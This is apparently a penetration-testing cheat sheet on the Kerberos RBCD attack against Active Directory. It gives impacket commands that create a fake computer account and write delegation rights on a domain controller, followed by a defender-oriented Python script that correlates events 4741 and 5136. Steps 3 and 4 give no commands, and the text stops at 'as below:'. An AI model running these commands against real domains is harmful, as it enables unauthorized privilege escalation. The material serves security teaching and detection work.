RBCD (Resource-Based Constrained Delegation) Attack

The Kerberos RBCD attack targets a domain computer, more precisely the service principals related to that computer.

Exploit

Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation

0. Prerequisites

To achieve this attack successfully, we need the following conditions:

  • A domain account that has permission to write to the target computer (the msDS-AllowedToActOnBehalfOfOtherIdentity property of the domain object).

  • A domain account that has permission to create a new computer.

  • LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.

  • Kerberos (88) access to the DC.

1. Create Fake Computer

impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'

2. Modify Delegation Rights

We can use rbcd.py to abuse the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target.

impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'
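
Steps 1 and 2 each leave a record on the DC: Security event 4741 when the computer account is created, and event 5136 when msDS-AllowedToActOnBehalfOfOtherIdentity is written. The correlation below is an added example for defenders, not code from the original page or from impacket; the flattened record layout, the function name and the sample events are constructed assumptions.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"

# Constructed sample records (not real logs). Field names follow Windows
# Security events 4741 and 5136, flattened to one dict per event (assumption).
SAMPLE_EVENTS = [
    {"EventID": 4741, "TimeCreated": "2024-05-01T10:00:05", "SubjectUserName": "username",
     "TargetUserName": "FAKECOMPUTER$"},
    {"EventID": 5136, "TimeCreated": "2024-05-01T10:02:40", "SubjectUserName": "username",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=example,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 5136, "TimeCreated": "2024-05-01T11:30:00", "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=WS01,CN=Computers,DC=example,DC=local",
     "AttributeLDAPDisplayName": "description"},
    {"EventID": 5136, "TimeCreated": "2024-05-02T09:00:00", "SubjectUserName": "svc-deploy",
     "ObjectDN": "CN=APP01,CN=Computers,DC=example,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
]


def find_rbcd_writes(events, window=timedelta(hours=24)):
    """Return one finding per write to the RBCD attribute, in time order.

    Severity is "high" when the same subject created a computer account within
    `window` before the write (steps 1 and 2 together), otherwise "review".
    """
    created = {}  # subject (lowercased) -> list of (time, new computer account)
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        when = datetime.fromisoformat(ev["TimeCreated"])
        who = ev.get("SubjectUserName", "").lower()
        if ev["EventID"] == 4741:
            created.setdefault(who, []).append((when, ev.get("TargetUserName", "")))
        elif (ev["EventID"] == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR):
            recent = [name for t, name in created.get(who, []) if when - t <= window]
            findings.append({
                "time": ev["TimeCreated"], "subject": who, "object": ev.get("ObjectDN"),
                "severity": "high" if recent else "review", "new_computers": recent,
            })
    return findings


if __name__ == "__main__":
    for finding in find_rbcd_writes(SAMPLE_EVENTS):
        print(finding)
```

Event 5136 is only written when directory service change auditing is enabled and the computer objects carry an audit entry (SACL) for the write.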

3. Get the Impersonated Service Ticket

Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.

4. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting. Before doing that, we need to add the environment variable as below:
